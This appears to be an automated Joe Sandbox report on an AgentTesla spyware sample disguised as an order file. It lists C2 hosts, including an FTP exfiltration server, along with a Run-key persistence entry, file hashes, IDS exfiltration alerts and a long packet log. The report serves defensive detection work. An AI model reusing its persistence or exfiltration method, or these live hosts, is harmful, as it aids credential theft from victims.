http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003018000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://rubberpartsmanufacturers.com | GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003018000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://stackoverflow.com/q/11564914/23354; | GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/2152978/23354 | GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ftp.alternatifplastik.com | InstallUtil.exe, 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1570412470.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1655327124.000000000340C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2583924445.000000000320C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
5.2.84.236 | ftp.alternatifplastik.com | Turkey | | 3188 | ALASTYRTR | true
103.191.208.122 | rubberpartsmanufacturers.com | unknown | | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | false

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1529933
                                      Start date and time:2024-10-09 15:00:44 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 16s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:11
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:GEFA-Order 232343-68983689.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                                      EGA Information:
                                      • Successful, ratio: 83.3%
                                      HCA Information:
                                      • Successful, ratio: 95%
                                      • Number of executed functions: 494
                                      • Number of non-executed functions: 27
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target InstallUtil.exe, PID 8048 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: GEFA-Order 232343-68983689.exe

Time | Type | Description
14:01:44 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fqhnalw C:\Users\user\AppData\Roaming\Fqhnalw.exe
14:01:52 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fqhnalw C:\Users\user\AppData\Roaming\Fqhnalw.exe

Match | Associated Sample Name / URL | Detection | Threat Name | Context
5.2.84.236 | GEFA-Order 232343-68983689.exe | malicious | AgentTesla |
5.2.84.236 | Kuwait Offer48783929281-BZ2.exe | malicious | AgentTesla |
5.2.84.236 | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla |
5.2.84.236 | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla |
5.2.84.236 | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | malicious | AgentTesla |
5.2.84.236 | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla |
5.2.84.236 | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla |
5.2.84.236 | PURCHASE ORDER ADDISON-6378397379UUE.exe | malicious | AgentTesla |
5.2.84.236 | Teklif-6205018797-6100052155-UUE.exe | malicious | AgentTesla |
5.2.84.236 | Offer-CNVN-82927-VIETNAM.exe | malicious | AgentTesla, PureLog Stealer |
103.191.208.122 | GEFA-Order 232343-68983689.exe | malicious | AgentTesla |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ftp.alternatifplastik.com | GEFA-Order 232343-68983689.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | Kuwait Offer48783929281-BZ2.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | PURCHASE ORDER ADDISON-6378397379UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | Teklif-6205018797-6100052155-UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | Offer-CNVN-82927-VIETNAM.exe | malicious | AgentTesla, PureLog Stealer | 5.2.84.236
s-part-0044.t-0009.fb-t-msedge.net | SWIFT 103 202410071251443120 071024-pdf.vbs | malicious | Remcos | 13.107.253.72
s-part-0044.t-0009.fb-t-msedge.net | PAYMENT APPLICATION.xls | malicious | Unknown | 13.107.253.72
s-part-0044.t-0009.fb-t-msedge.net | Change_To_Null.ps1 | malicious | Unknown | 13.107.253.72
s-part-0044.t-0009.fb-t-msedge.net | https://ggoryo.com/trade/da.php?11254 | malicious | Unknown | 13.107.253.72
s-part-0044.t-0009.fb-t-msedge.net | Scan08.10.24(Massimiliano.benso)CQDM.html | malicious | HTMLPhisher | 13.107.253.72
s-part-0044.t-0009.fb-t-msedge.net | http://js.schema-forms.org | malicious | Unknown | 13.107.253.72
s-part-0044.t-0009.fb-t-msedge.net | 5zA3mXMdtG.exe | malicious | SmokeLoader | 13.107.253.72
s-part-0044.t-0009.fb-t-msedge.net | Aew8SXjXEb.exe | malicious | Stealc | 13.107.253.72
s-part-0044.t-0009.fb-t-msedge.net | TuQlz67byH.exe | malicious | LummaC | 13.107.253.72
s-part-0044.t-0009.fb-t-msedge.net | https://future.nhs.uk | malicious | Unknown | 13.107.253.72
rubberpartsmanufacturers.com | GEFA-Order 232343-68983689.exe | malicious | AgentTesla | 103.191.208.122

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ALASTYRTR | GEFA-Order 232343-68983689.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | Kuwait Offer48783929281-BZ2.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | PURCHASE ORDER ADDISON-6378397379UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | Teklif-6205018797-6100052155-UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | BROU_Copia de Pago_PDF.exe | malicious | Unknown | 5.2.84.221
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | 4wwi2Lh5W4.exe | malicious | Unknown | 103.169.142.0
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | xQOrkxePXD.exe | malicious | Remcos | 103.186.117.228
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | GEFA-Order 232343-68983689.exe | malicious | AgentTesla | 103.191.208.122
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | na.elf | malicious | Mirai | 103.33.73.172
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | Remittance_Regulvar.htm | malicious | Unknown | 103.67.200.72
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | 2LgQzImW3E.elf | malicious | Mirai | 103.183.119.56
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | Quote.exe | malicious | Remcos | 103.186.117.77
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | f8fKadLyb4.elf | malicious | Mirai | 150.203.163.29
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | zYJYK66EGb.exe | malicious | Remcos | 103.186.116.195
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | na.elf | malicious | Unknown | 134.150.211.105

Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | GsZkXAmf61.exe | malicious | Celestial Rat | 103.191.208.122
3b5074b1b5d032e5620f69f9f700ff0e | Rechnung-62671596778856538170.vbs | malicious | PureLog Stealer | 103.191.208.122
3b5074b1b5d032e5620f69f9f700ff0e | kNyZqDECXJ.exe | malicious | AgentTesla, PureLog Stealer | 103.191.208.122
3b5074b1b5d032e5620f69f9f700ff0e | MiLa0yslQQ.exe | malicious | Snake Keylogger, VIP Keylogger | 103.191.208.122
3b5074b1b5d032e5620f69f9f700ff0e | https://imago-technologies.com/ | malicious | Unknown | 103.191.208.122
3b5074b1b5d032e5620f69f9f700ff0e | 7DI4iYwcvw.exe | malicious | Snake Keylogger, VIP Keylogger | 103.191.208.122
3b5074b1b5d032e5620f69f9f700ff0e | RFQ 2413AM-KE2800.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 103.191.208.122
3b5074b1b5d032e5620f69f9f700ff0e | SWIFT 103 202410071251443120 071024-pdf.vbs | malicious | Remcos | 103.191.208.122
3b5074b1b5d032e5620f69f9f700ff0e | SAS #U00e7#U0131kt#U0131.PDF.exe | malicious | Unknown | 103.191.208.122
3b5074b1b5d032e5620f69f9f700ff0e | TBC-9720743871300.vbs | malicious | GuLoader, Snake Keylogger | 103.191.208.122

                                                            No context
                                                            Process:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):6.02843317883365
                                                            Encrypted:false
                                                            SSDEEP:768:L4lCZTEnqqVW1ZwqBMHlfXfLHTwfxlgqkCWIU:E1qqV8wqevfPWuCG
                                                            MD5:7EDAA96C807197B45FFB4F442AB3BFAA
                                                            SHA1:A87DB0D82F05E80B4511667C01305993D9265806
                                                            SHA-256:359C1E634D4B0D664443DCA2EF11D6F5D68DCD381D56845E9212766B8B67E64F
                                                            SHA-512:5D8C898DBD2CEA8CC0F76AE315AB6AD0E6B466EC78DDC9F3F5D4987329A6DCC924ACF0C9F431A4093F64A99E7CC4F1038E4E6233330A27E4C53DE8DD91E45FE4
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                            Reputation:low
                                                            Process:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):6.02843317883365
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:GEFA-Order 232343-68983689.exe
                                                            File size:39'936 bytes
                                                            MD5:7edaa96c807197b45ffb4f442ab3bfaa
                                                            SHA1:a87db0d82f05e80b4511667c01305993d9265806
                                                            SHA256:359c1e634d4b0d664443dca2ef11d6f5d68dcd381d56845e9212766b8b67e64f
                                                            SHA512:5d8c898dbd2cea8cc0f76ae315ab6ad0e6b466ec78ddc9f3f5d4987329a6dcc924acf0c9f431a4093f64a99e7cc4f1038e4e6233330a27e4c53de8dd91e45fe4
                                                            SSDEEP:768:L4lCZTEnqqVW1ZwqBMHlfXfLHTwfxlgqkCWIU:E1qqV8wqevfPWuCG
                                                            TLSH:DC033A0C33CD7A12C77C6A7E86F7560C43F461F72613D38A9F8421A45853FA1AA1BB52
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x40b08e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x670666A9 [Wed Oct 9 11:19:05 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb034 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9094 | 0x9200 | 1465902bc6a66091e5a7cebea983d74a | False | 0.5851616010273972 | data | 6.154726154463115 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x600 | 0x600 | d5cc1c1939657c287c0f167b54dfe361 | False | 0.4186197916666667 | data | 4.105685477879507 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 31279fef8d644844c11c01f3de958b66 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x32c | data |  |  | 0.4224137931034483
RT_MANIFEST | 0xc3cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-09T15:01:45.449007+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.9 | 49766 | 5.2.84.236 | 21 | TCP
2024-10-09T15:01:46.061718+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49775 | 5.2.84.236 | 58997 | TCP
2024-10-09T15:01:46.068204+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49775 | 5.2.84.236 | 58997 | TCP
2024-10-09T15:02:02.253420+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.9 | 49853 | 5.2.84.236 | 21 | TCP
2024-10-09T15:02:02.887826+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49865 | 5.2.84.236 | 63612 | TCP
2024-10-09T15:02:02.893477+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49865 | 5.2.84.236 | 63612 | TCP
2024-10-09T15:02:10.076009+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.9 | 49894 | 5.2.84.236 | 21 | TCP
2024-10-09T15:02:10.692825+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49905 | 5.2.84.236 | 65429 | TCP
2024-10-09T15:02:10.698545+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49905 | 5.2.84.236 | 65429 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Oct 9, 2024 15:01:39.285434961 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.285487890 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.285558939 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.285615921 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.285898924 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.285952091 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.372782946 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.372936010 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.372946024 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.372993946 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.373028994 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.373035908 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.373064041 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.373083115 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.373106956 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.373126030 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.373234034 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.373332977 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.373555899 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.373610973 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.373627901 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.373641014 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.373687029 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.373687029 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.373992920 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.374028921 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.374082088 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.374094009 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.374145985 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.374145985 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.374602079 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.374670982 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.374686003 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.374727964 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.374747038 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.374759912 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.374798059 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.374819040 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.374931097 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.374989986 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.375439882 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.375511885 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.516508102 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.516625881 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.516712904 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.516766071 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.517080069 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.517131090 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.517142057 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.517153978 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.517180920 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.517189026 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.517471075 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.517533064 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.517703056 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.517755985 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.517934084 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.518017054 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.518280029 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.518342972 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.518503904 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.518564939 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.518575907 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.518634081 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.519115925 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.519151926 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.519176960 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.519188881 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.519205093 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.519222975 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.519525051 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.519577980 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.519578934 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.519588947 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.519624949 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.519800901 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.519859076 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.519990921 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.520026922 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.520045042 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.520052910 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.520070076 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.520090103 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.604932070 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.605045080 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.605240107 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.605350018 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.605350018 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.605609894 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.605653048 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.605690956 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.605710030 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.605730057 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.605753899 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.605969906 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.606040001 CEST49727443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:01:39.606216908 CEST44349727103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:01:39.606280088 CEST49727443192.168.2.9103.191.208.122
